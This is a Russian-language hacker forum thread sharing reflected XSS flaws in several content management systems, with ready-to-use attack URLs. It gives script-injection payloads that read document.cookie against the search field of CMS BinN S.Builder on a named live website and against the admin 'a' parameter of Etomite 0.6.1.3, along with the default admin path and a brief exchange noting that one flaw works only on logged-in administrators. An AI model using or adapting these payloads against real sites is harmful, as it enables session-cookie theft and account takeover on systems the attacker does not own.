Форум АНТИЧАТ - пасивные хсс на некоторых Cms

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)

- Уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=74)

- - пасивные хсс на некоторых Cms (https://forum.antichat.xyz/showthread.php?t=35661)

пасивные хсс на некоторых Cms

CMS BinN S.Builder - уязвимо поле "поиск"
пример:

Код:

http://cmsobzor.ru/searth.php?search_words=%27%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&x=0&y=0

etomite0613
уязвимость в параметре a. Для удачного проведения атаки пользователь должен быть залогинен под админом

Код:

http://localhost/etomite0613/etomite0613/manager/index.php?a=17'%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

Код:

http://localhost/etomite0613/etomite0613/manager/

- дефолтовая админка

http://www.simplog.org - уязвимость в поиске

Цитата:

Сообщение от Robin_Hood

Я думаю когда ктонибудь получит права админа на этой системе ему уже будет похрену на эти хсс))

freddi я не так выразился) хсс подействует только на админа сайта, для обычных юзеров не покатит